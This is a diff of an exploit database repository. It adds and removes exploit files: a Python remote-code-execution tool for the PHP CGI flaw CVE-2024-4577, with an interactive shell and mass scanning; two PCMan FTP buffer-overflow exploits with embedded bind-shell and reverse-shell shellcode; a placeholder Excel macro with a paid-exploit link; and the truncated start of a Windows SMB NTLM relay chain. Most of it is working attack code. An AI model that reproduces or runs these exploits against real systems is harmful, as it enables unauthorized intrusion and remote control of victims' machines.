"""CVE-2024-4577 PHP CGI Argument Injection RCE Exploit"""
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
self.headers = {
|
||||||
|
"Content-Type": "application/x-www-form-urlencoded",
|
||||||
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Optimized settings for PHP CGI argument injection
|
||||||
|
self.php_settings = [
|
||||||
|
"-d cgi.force_redirect=0",
|
||||||
|
"-d cgi.redirect_status_env=0",
|
||||||
|
"-d fastcgi.impersonate=1",
|
||||||
|
"-d open_basedir=",
|
||||||
|
"-d disable_functions=",
|
||||||
|
"-d auto_prepend_file=php://input",
|
||||||
|
"-d allow_url_include=1",
|
||||||
|
"-d allow_url_fopen=1"
|
||||||
|
]
|
||||||
|
|
||||||
|
# Soft hyphen character for Windows systems
|
||||||
|
self.soft_hyphen = "%AD" # 0xAD character
|
||||||
|
|
||||||
|
# Different PHP CGI paths to try
|
||||||
|
self.cgi_paths = [
|
||||||
|
"/php-cgi/php-cgi.exe",
|
||||||
|
"/php/php-cgi.exe",
|
||||||
|
"/cgi-bin/php-cgi.exe",
|
||||||
|
"/php-cgi.exe",
|
||||||
|
"/php.exe",
|
||||||
|
"/php/php.exe"
|
||||||
|
]
|
||||||
|
|
||||||
|
def ascii_art(self):
|
||||||
|
print("")
|
||||||
|
console.print("[bold red] ____ _ _ ____ ____ ____ ___[/bold red]")
|
||||||
|
console.print("[bold red] | _ \| | | | _ \ / ___|/ ___|_ _|[/bold red]")
|
||||||
|
console.print("[bold red] | |_) | |_| | |_) | | | | | _ | |[/bold red]")
|
||||||
|
console.print("[bold red] | __/| _ | __/ | |___| |_| || |[/bold red]")
|
||||||
|
console.print("[bold red] |_| |_| |_|_| \____|\____|___|[/bold red]")
|
||||||
|
console.print("[bold yellow] CVE-2024-4577 Exploit[/bold yellow]")
|
||||||
|
console.print("[dim white] PHP CGI Argument Injection[/dim white]")
|
||||||
|
console.print("[dim cyan] Developer: @ibrahimsql[/dim cyan]")
|
||||||
|
print("")
|
||||||
|
|
||||||
|
def build_payload_url(self, cgi_path):
|
||||||
|
# Argument injection with soft hyphen
|
||||||
|
settings_str = " ".join(self.php_settings).replace("-", self.soft_hyphen)
|
||||||
|
settings_str = settings_str.replace("=", "%3D").replace(" ", "+")
|
||||||
|
return f"{cgi_path}?{settings_str}"
|
||||||
|
|
||||||
|
def execute_command(self, target, command="whoami", cgi_path=None):
|
||||||
|
"""Execute command on target using PHP CGI argument injection"""
|
||||||
|
try:
|
||||||
|
# Create PHP code
|
||||||
|
php_code = f"""<?php
|
||||||
|
error_reporting(0);
|
||||||
|
echo '[START]';
|
||||||
|
system('{command}');
|
||||||
|
echo '[END]';
|
||||||
|
die();
|
||||||
|
?>"""
|
||||||
|
|
||||||
|
# If no CGI path specified, try all paths
|
||||||
|
if cgi_path:
|
||||||
|
paths_to_try = [cgi_path]
|
||||||
|
else:
|
||||||
|
paths_to_try = self.cgi_paths
|
||||||
|
|
||||||
|
for path in paths_to_try:
|
||||||
|
try:
|
||||||
|
payload_url = self.build_payload_url(path)
|
||||||
|
full_url = f"{target.rstrip('/')}{payload_url}"
|
||||||
|
|
||||||
|
response = requests.post(
|
||||||
|
full_url,
|
||||||
|
headers=self.headers,
|
||||||
|
data=php_code,
|
||||||
|
timeout=10,
|
||||||
|
verify=False,
|
||||||
|
allow_redirects=False
|
||||||
|
)
|
||||||
|
|
||||||
|
# Check output
|
||||||
|
if response.status_code == 200:
|
||||||
|
output_match = re.search(r'\[START\](.*?)\[END\]', response.text, re.DOTALL)
|
||||||
|
if output_match:
|
||||||
|
return output_match.group(1).strip(), path
|
||||||
|
|
||||||
|
except requests.exceptions.RequestException:
|
||||||
|
continue
|
||||||
|
|
||||||
|
return None, None
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
console.print(f"[red][-][/red] Error: {str(e)}")
|
||||||
|
return None, None
|
||||||
|
|
||||||
|
def check_vulnerability(self, target):
|
||||||
|
"""Check if target is vulnerable"""
|
||||||
|
console.print(f"[blue][*][/blue] Testing target: {target}")
|
||||||
|
|
||||||
|
# Test with a simple command
|
||||||
|
result, cgi_path = self.execute_command(target, "echo CVE-2024-4577-TEST")
|
||||||
|
|
||||||
|
if result and "CVE-2024-4577-TEST" in result:
|
||||||
|
console.print(f"[green][+][/green] Target is vulnerable! CGI Path: {cgi_path}")
|
||||||
|
|
||||||
|
# Get system information
|
||||||
|
sys_info, _ = self.execute_command(target, "systeminfo", cgi_path)
|
||||||
|
if sys_info:
|
||||||
|
console.print("[green][+][/green] System Information:")
|
||||||
|
console.print(f"[dim]{sys_info[:500]}...[/dim]") # First 500 characters
|
||||||
|
|
||||||
|
return True, cgi_path
|
||||||
|
else:
|
||||||
|
console.print(f"[red][-][/red] Target is not vulnerable")
|
||||||
|
return False, None
|
||||||
|
|
||||||
|
def interactive_shell(self, target, cgi_path):
|
||||||
|
"""Interactive shell session - Simple version"""
|
||||||
|
console.print("[green][+][/green] Interactive shell opened")
|
||||||
|
console.print("[yellow][!][/yellow] Type 'exit' to quit, 'clear' to clear screen")
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
# Simple input prompt
|
||||||
|
cmd = input("shell> ")
|
||||||
|
|
||||||
|
if cmd.lower() == "exit":
|
||||||
|
break
|
||||||
|
elif cmd.lower() == "clear":
|
||||||
|
print("\033[2J\033[H", end="")
|
||||||
|
continue
|
||||||
|
elif cmd.strip() == "":
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Execute command
|
||||||
|
result, _ = self.execute_command(target, cmd, cgi_path)
|
||||||
|
|
||||||
|
if result:
|
||||||
|
print(result)
|
||||||
|
else:
|
||||||
|
console.print("[red][-][/red] Command execution failed")
|
||||||
|
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
console.print("\n[yellow][!][/yellow] Use 'exit' to quit")
|
||||||
|
except Exception as e:
|
||||||
|
console.print(f"[red][-][/red] Error: {str(e)}")
|
||||||
|
|
||||||
|
def exploit_target(self, target, output_file=None):
|
||||||
|
"""Exploit single target"""
|
||||||
|
is_vulnerable, cgi_path = self.check_vulnerability(target)
|
||||||
|
|
||||||
|
if is_vulnerable:
|
||||||
|
# Save results
|
||||||
|
if output_file:
|
||||||
|
with open(output_file, "a") as f:
|
||||||
|
f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n")
|
||||||
|
|
||||||
|
# Start interactive shell
|
||||||
|
console.print("[blue][*][/blue] Starting interactive shell...")
|
||||||
|
self.interactive_shell(target, cgi_path)
|
||||||
|
else:
|
||||||
|
if output_file:
|
||||||
|
with open(output_file, "a") as f:
|
||||||
|
f.write(f"[-] Not vulnerable: {target}\n")
|
||||||
|
|
||||||
|
def scan_multiple_targets(self, targets_file, threads=5, output_file=None):
|
||||||
|
"""Scan multiple targets"""
|
||||||
|
try:
|
||||||
|
with open(targets_file, "r") as f:
|
||||||
|
targets = [line.strip() for line in f if line.strip()]
|
||||||
|
|
||||||
|
if not targets:
|
||||||
|
console.print("[red][-][/red] No targets found in file")
|
||||||
|
return
|
||||||
|
|
||||||
|
console.print(f"[blue][*][/blue] Scanning {len(targets)} targets with {threads} threads")
|
||||||
|
|
||||||
|
vulnerable_targets = []
|
||||||
|
|
||||||
|
def scan_target(target):
|
||||||
|
try:
|
||||||
|
is_vulnerable, cgi_path = self.check_vulnerability(target)
|
||||||
|
if is_vulnerable:
|
||||||
|
vulnerable_targets.append((target, cgi_path))
|
||||||
|
if output_file:
|
||||||
|
with open(output_file, "a") as f:
|
||||||
|
f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n")
|
||||||
|
except Exception as e:
|
||||||
|
console.print(f"[red][-][/red] Error scanning {target}: {str(e)}")
|
||||||
|
|
||||||
|
with alive_bar(len(targets), title="Scanning", bar="smooth") as bar:
|
||||||
|
with ThreadPoolExecutor(max_workers=threads) as executor:
|
||||||
|
futures = [executor.submit(scan_target, target) for target in targets]
|
||||||
|
for future in as_completed(futures):
|
||||||
|
future.result()
|
||||||
|
bar()
|
||||||
|
|
||||||
|
# Summary
|
||||||
|
print("")
|
||||||
|
console.print(f"[green][+][/green] Found {len(vulnerable_targets)} vulnerable targets")
|
||||||
|
|
||||||
|
if vulnerable_targets:
|
||||||
|
console.print("\n[bold]Vulnerable Targets:[/bold]")
|
||||||
|
for target, cgi_path in vulnerable_targets:
|
||||||
|
console.print(f" [green]•[/green] {target} (CGI: {cgi_path})")
|
||||||
|
|
||||||
|
except FileNotFoundError:
|
||||||
|
console.print(f"[red][-][/red] File not found: {targets_file}")
|
||||||
|
except Exception as e:
|
||||||
|
console.print(f"[red][-][/red] Error: {str(e)}")
|
||||||
|
|
||||||
|
def main():
|
||||||
|
"""Main function"""
|
||||||
|
exploit = PHPCGIExploit()
|
||||||
|
exploit.ascii_art()
|
||||||
|
|
||||||
|
parser = argparse.ArgumentParser(
|
||||||
|
description="CVE-2024-4577 - PHP CGI Argument Injection RCE Exploit",
|
||||||
|
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||||
|
epilog="""
|
||||||
|
Examples:
|
||||||
|
python3 exploit.py -u http://target.com
|
||||||
|
python3 exploit.py -f targets.txt -t 10 -o results.txt
|
||||||
|
|
||||||
|
Note: This tool is for educational and authorized testing purposes only.
|
||||||
|
"""
|
||||||
|
)
|
||||||
|
|
||||||
|
parser.add_argument("-u", "--url", help="Single target URL")
|
||||||
|
parser.add_argument("-f", "--file", help="File containing target URLs")
|
||||||
|
parser.add_argument("-o", "--output", help="Output file for results")
|
||||||
|
parser.add_argument("-t", "--threads", type=int, default=5, help="Number of threads (default: 5)")
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
if args.url:
|
||||||
|
exploit.exploit_target(args.url, args.output)
|
||||||
|
elif args.file:
|
||||||
|
exploit.scan_multiple_targets(args.file, args.threads, args.output)
|
||||||
|
else:
|
||||||
|
parser.print_help()
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
67
exploits/windows/local/52332.txt
Normal file
67
exploits/windows/local/52332.txt
Normal file
|
@ -0,0 +1,67 @@
|
||||||
|
# Titles: Microsoft Excel Use After Free - Local Code Execution
|
||||||
|
# Author: nu11secur1ty
|
||||||
|
# Date: 06/09/2025
|
||||||
|
# Vendor: Microsoft
|
||||||
|
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
|
||||||
|
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
|
||||||
|
# Versions: MS Excel 2016, MS Office Online Server KB5002699
|
||||||
|
# CVE-2025-27751
|
||||||
|
|
||||||
|
## Description:
|
||||||
|
The attacker can trick any user into opening and executing their code by
|
||||||
|
sending a malicious DOCX file via email or a streaming server.
|
||||||
|
After the execution of the victim, his machine can be infected or even
|
||||||
|
worse than ever; this could be the end of his Windows machine!
|
||||||
|
|
||||||
|
STATUS: HIGH-CRITICAL Vulnerability
|
||||||
|
|
||||||
|
|
||||||
|
[+]Exploit:
|
||||||
|
|
||||||
|
```
|
||||||
|
Sub hello()
|
||||||
|
Dim Program As String
|
||||||
|
Dim TaskID As Double
|
||||||
|
On Error Resume Next
|
||||||
|
---------------------------------------
|
||||||
|
Program = "WRITE YOUR OWN EXPLOIT HERE"
|
||||||
|
TaskID = ...YOUR TASK HERE...
|
||||||
|
---------------------------------------
|
||||||
|
If Err <> 0 Then
|
||||||
|
MsgBox "Can't start " & Program
|
||||||
|
End If
|
||||||
|
End Sub
|
||||||
|
```
|
||||||
|
|
||||||
|
# Reproduce:
|
||||||
|
[href](https://www.youtube.com/watch?v=ArI0ZeChYE4)
|
||||||
|
|
||||||
|
# Buy an exploit only:
|
||||||
|
[href](https://satoshidisk.com/pay/COb5oS)
|
||||||
|
|
||||||
|
# Time spent:
|
||||||
|
00:35:00
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
System Administrator - Infrastructure Engineer
|
||||||
|
Penetration Testing Engineer
|
||||||
|
Exploit developer at https://packetstormsecurity.com/
|
||||||
|
https://cve.mitre.org/index.html
|
||||||
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
||||||
|
0day Exploit DataBase https://0day.today/
|
||||||
|
home page: https://www.nu11secur1ty.com/
|
||||||
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
||||||
|
nu11secur1ty <http://nu11secur1ty.com/>
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
System Administrator - Infrastructure Engineer
|
||||||
|
Penetration Testing Engineer
|
||||||
|
Exploit developer at https://packetstorm.news/
|
||||||
|
https://cve.mitre.org/index.html
|
||||||
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
||||||
|
0day Exploit DataBase https://0day.today/
|
||||||
|
home page: https://www.nu11secur1ty.com/
|
||||||
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
||||||
|
nu11secur1ty <http://nu11secur1ty.com/>
|
|
@ -1,129 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
import signal
|
|
||||||
from time import sleep
|
|
||||||
from socket import *
|
|
||||||
from sys import exit, exc_info
|
|
||||||
|
|
||||||
#
|
|
||||||
# Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
|
|
||||||
# Discovered and Reported******June 2013
|
|
||||||
# Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
|
|
||||||
# Exploit/Advisory*************http://infosec42.blogspot.com/
|
|
||||||
# Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21)
|
|
||||||
# Tested Commands*************USER (Other commands were not tested and may be vulnerable)
|
|
||||||
# CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending
|
|
||||||
#
|
|
||||||
|
|
||||||
|
|
||||||
def sigHandle(signum, frm): # Signal handler
|
|
||||||
|
|
||||||
print "\n[!!!] Cleaning up the exploit... [!!!]\n"
|
|
||||||
sleep(1)
|
|
||||||
exit(0)
|
|
||||||
|
|
||||||
|
|
||||||
def targServer():
|
|
||||||
|
|
||||||
while True:
|
|
||||||
try:
|
|
||||||
server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the PCMan FTP Server:\n\n>"))
|
|
||||||
server = inet_ntoa(server)
|
|
||||||
break
|
|
||||||
except:
|
|
||||||
print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
|
|
||||||
sleep(1)
|
|
||||||
continue
|
|
||||||
|
|
||||||
return server
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
|
|
||||||
print ("""\n [*] Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
|
|
||||||
[*] Discovered and Reported******June 2013
|
|
||||||
[*] Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
|
|
||||||
[*] Exploit/Advisory*************http://infosec42.blogspot.com/
|
|
||||||
[*] Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21)
|
|
||||||
[*] Tested Commands*************USER (Other commands were not tested and may be vulnerable)
|
|
||||||
[*] CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending""")
|
|
||||||
signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
|
|
||||||
victim = targServer()
|
|
||||||
port = int(21)
|
|
||||||
Cmd = "USER " #Vulnerable command
|
|
||||||
JuNk = "\x42" * 2004
|
|
||||||
# KERNEL32.dll 7CA58265 - JMP ESP
|
|
||||||
ret = "\x65\x82\xA5\x7C"
|
|
||||||
NOP = "\x90" * 50
|
|
||||||
|
|
||||||
#348 Bytes Bind Shell Port TCP/4444
|
|
||||||
#msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R |
|
|
||||||
#msfencode -e x86/shikata_ga_nai -c 1 -b "\x0d\x0a\x00\xf1" R
|
|
||||||
shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
|
|
||||||
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
|
|
||||||
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
|
|
||||||
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
|
|
||||||
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
|
|
||||||
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
|
|
||||||
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
|
|
||||||
shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80"
|
|
||||||
shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98"
|
|
||||||
shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7"
|
|
||||||
shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0"
|
|
||||||
shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82"
|
|
||||||
shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0"
|
|
||||||
shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6"
|
|
||||||
shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d"
|
|
||||||
shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32"
|
|
||||||
shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90"
|
|
||||||
shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5"
|
|
||||||
shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71"
|
|
||||||
shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2"
|
|
||||||
shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f"
|
|
||||||
shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14"
|
|
||||||
shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec"
|
|
||||||
shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88"
|
|
||||||
shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79"
|
|
||||||
|
|
||||||
sploit = Cmd + JuNk + ret + NOP + shellcode
|
|
||||||
sploit += "\x42" * (2992 - len(NOP + shellcode)) + "\r\n"
|
|
||||||
|
|
||||||
try:
|
|
||||||
print "\n [*] Creating network socket."
|
|
||||||
net_sock = socket(AF_INET, SOCK_STREAM)
|
|
||||||
except:
|
|
||||||
print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()
|
|
||||||
sleep(1)
|
|
||||||
exit(0)
|
|
||||||
|
|
||||||
try:
|
|
||||||
print " [*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port)
|
|
||||||
net_sock.connect((victim, port))
|
|
||||||
except:
|
|
||||||
print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
|
|
||||||
sleep(1)
|
|
||||||
exit(0)
|
|
||||||
|
|
||||||
try:
|
|
||||||
print """ [*] Attempting to exploit the FTP USER command.
|
|
||||||
[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
|
|
||||||
[*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
|
|
||||||
net_sock.send(sploit)
|
|
||||||
sleep(1)
|
|
||||||
except:
|
|
||||||
print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())
|
|
||||||
sleep(1)
|
|
||||||
exit(0)
|
|
||||||
|
|
||||||
try:
|
|
||||||
print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
|
|
||||||
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n"""
|
|
||||||
net_sock.close()
|
|
||||||
except:
|
|
||||||
print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info()
|
|
||||||
sleep(1)
|
|
||||||
exit(0)
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
main()
|
|
72
exploits/windows/remote/52326.txt
Normal file
72
exploits/windows/remote/52326.txt
Normal file
|
@ -0,0 +1,72 @@
|
||||||
|
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
|
||||||
|
# Date: 04/17/2025
|
||||||
|
# Exploit Author: Fernando Mengali
|
||||||
|
# Vendor Homepage: http://pcman.openfoundry.org/
|
||||||
|
# Software Link:
|
||||||
|
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
|
||||||
|
# Version: 2.0.7
|
||||||
|
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
|
||||||
|
Service Pack 2)
|
||||||
|
# CVE: CVE-2025-4255
|
||||||
|
|
||||||
|
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
|
||||||
|
EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
|
||||||
|
#offset: 2007
|
||||||
|
#badchars: \x00\x0a\x0d
|
||||||
|
#EIP: 0x74e32fd9 (JMP ESP)
|
||||||
|
|
||||||
|
my $buf =
|
||||||
|
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
|
||||||
|
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
|
||||||
|
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd7\xbc\x29\x6f\x9c\xef\x99" .
|
||||||
|
"\xfb\xf0\x03\x51\xa9\xe0\x90\x17\x66\x07\x10\x9d\x50\x26" .
|
||||||
|
"\xa1\x8e\xa1\x29\x21\xcd\xf5\x89\x18\x1e\x08\xc8\x5d\x43" .
|
||||||
|
"\xe1\x98\x36\x0f\x54\x0c\x32\x45\x65\xa7\x08\x4b\xed\x54" .
|
||||||
|
"\xd8\x6a\xdc\xcb\x52\x35\xfe\xea\xb7\x4d\xb7\xf4\xd4\x68" .
|
||||||
|
"\x01\x8f\x2f\x06\x90\x59\x7e\xe7\x3f\xa4\x4e\x1a\x41\xe1" .
|
||||||
|
"\x69\xc5\x34\x1b\x8a\x78\x4f\xd8\xf0\xa6\xda\xfa\x53\x2c" .
|
||||||
|
"\x7c\x26\x65\xe1\x1b\xad\x69\x4e\x6f\xe9\x6d\x51\xbc\x82" .
|
||||||
|
"\x8a\xda\x43\x44\x1b\x98\x67\x40\x47\x7a\x09\xd1\x2d\x2d" .
|
||||||
|
"\x36\x01\x8e\x92\x92\x4a\x23\xc6\xae\x11\x2c\x2b\x83\xa9" .
|
||||||
|
"\xac\x23\x94\xda\x9e\xec\x0e\x74\x93\x65\x89\x83\xd4\x5f" .
|
||||||
|
"\x6d\x1b\x2b\x60\x8e\x32\xe8\x34\xde\x2c\xd9\x34\xb5\xac" .
|
||||||
|
"\xe6\xe0\x1a\xfc\x48\x5b\xdb\xac\x28\x0b\xb3\xa6\xa6\x74" .
|
||||||
|
"\xa3\xc9\x6c\x1d\x4e\x30\xe7\xe2\x27\x8a\x7f\x8a\x35\xea" .
|
||||||
|
"\x6e\x17\xb3\x0c\xfa\xb7\x95\x87\x93\x2e\xbc\x53\x05\xae" .
|
||||||
|
"\x6a\x1e\x05\x24\x99\xdf\xc8\xcd\xd4\xf3\xbd\x3d\xa3\xa9" .
|
||||||
|
"\x68\x41\x19\xc5\xf7\xd0\xc6\x15\x71\xc9\x50\x42\xd6\x3f" .
|
||||||
|
"\xa9\x06\xca\x66\x03\x34\x17\xfe\x6c\xfc\xcc\xc3\x73\xfd" .
|
||||||
|
"\x81\x78\x50\xed\x5f\x80\xdc\x59\x30\xd7\x8a\x37\xf6\x81" .
|
||||||
|
"\x7c\xe1\xa0\x7e\xd7\x65\x34\x4d\xe8\xf3\x39\x98\x9e\x1b" .
|
||||||
|
"\x8b\x75\xe7\x24\x24\x12\xef\x5d\x58\x82\x10\xb4\xd8\xa2" .
|
||||||
|
"\xf2\x1c\x15\x4b\xab\xf5\x94\x16\x4c\x20\xda\x2e\xcf\xc0" .
|
||||||
|
"\xa3\xd4\xcf\xa1\xa6\x91\x57\x5a\xdb\x8a\x3d\x5c\x48\xaa" .
|
||||||
|
"\x17";
|
||||||
|
|
||||||
|
|
||||||
|
# Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2)
|
||||||
|
|
||||||
|
my $sock = IO::Socket::INET->new(
|
||||||
|
PeerAddr => "192.168.176.131",
|
||||||
|
PeerPort => "21",
|
||||||
|
Proto => 'tcp',
|
||||||
|
) or die "Cannot connect to 192.168.176.131:21: $!\n";
|
||||||
|
|
||||||
|
my $offset = "A"x2007;
|
||||||
|
my $eip = "\xd9\x2f\xe3\x74";
|
||||||
|
my $nops = "\x90"x20;
|
||||||
|
my $payload = $offset . $eip . $nops . $buf;
|
||||||
|
my $r = <$sock>;
|
||||||
|
print $sock "USER anonymous\r\n";
|
||||||
|
$r = <$sock>;
|
||||||
|
print $r;
|
||||||
|
sleep(1);
|
||||||
|
print $sock "PASS anonymous\r\n";
|
||||||
|
$r = <$sock>;
|
||||||
|
print $r;
|
||||||
|
sleep(1);
|
||||||
|
print $sock "RMD $payload\r\n";
|
||||||
|
$r = <$sock>;
|
||||||
|
print $r;
|
||||||
|
sleep(1);
|
||||||
|
close($sock);
|
121
exploits/windows/remote/52330.py
Executable file
121
exploits/windows/remote/52330.py
Executable file
|
@ -0,0 +1,121 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
# Exploit Title: Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
|
||||||
|
# Author: Mohammed Idrees Banyamer
|
||||||
|
# Instagram: @banyamer_security
|
||||||
|
# GitHub: https://github.com/mbanyamer
|
||||||
|
# Date: 2025-06-13
|
||||||
|
# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
|
||||||
|
# CVE: CVE-2025-33073
|
||||||
|
# Type: Remote
|
||||||
|
# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
|
||||||
|
# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
|
||||||
|
# User Interaction: Required (authenticated domain user)
|
||||||
|
# Remediation Level: Official Fix Available
|
||||||
|
#
|
||||||
|
# Affected Versions:
|
||||||
|
# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)
|
||||||
|
# - Windows Server 2022 (including 23H2 editions)
|
||||||
|
# - Windows Server 2019
|
||||||
|
# - Windows 10 versions from 1507 up to 22H2
|
||||||
|
# - Windows Server 2016 and 2008 (with appropriate versions)
|
||||||
|
#
|
||||||
|
# Description:
|
||||||
|
# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,
|
||||||
|
# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,
|
||||||
|
# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server
|
||||||
|
# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),
|
||||||
|
# Windows Server 2022, and earlier versions vulnerable to this method.
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Note: The exploit requires the victim to be an authenticated domain user and the environment
|
||||||
|
# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).
|
||||||
|
#
|
||||||
|
# DISCLAIMER: For authorized security testing and educational use only.
|
||||||
|
|
||||||
|
import argparse
|
||||||
|
import subprocess
|
||||||
|
import socket
|
||||||
|
import time
|
||||||
|
import sys
|
||||||
|
|
||||||
|
def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
|
||||||
|
print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
|
||||||
|
cmd = [
|
||||||
|
"samba-tool", "dns", "add", dns_ip, dc_fqdn,
|
||||||
|
record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
|
||||||
|
]
|
||||||
|
try:
|
||||||
|
subprocess.run(cmd, check=True)
|
||||||
|
print("[+] DNS record successfully added.")
|
||||||
|
except subprocess.CalledProcessError:
|
||||||
|
print("[!] Failed to add DNS record. Check credentials and connectivity.")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
def check_record(record_name):
|
||||||
|
print("[*] Verifying DNS record propagation...")
|
||||||
|
for i in range(10):
|
||||||
|
try:
|
||||||
|
result = socket.gethostbyname_ex(record_name)
|
||||||
|
if result and result[2]:
|
||||||
|
print(f"[+] DNS record resolved to: {result[2]}")
|
||||||
|
return True
|
||||||
|
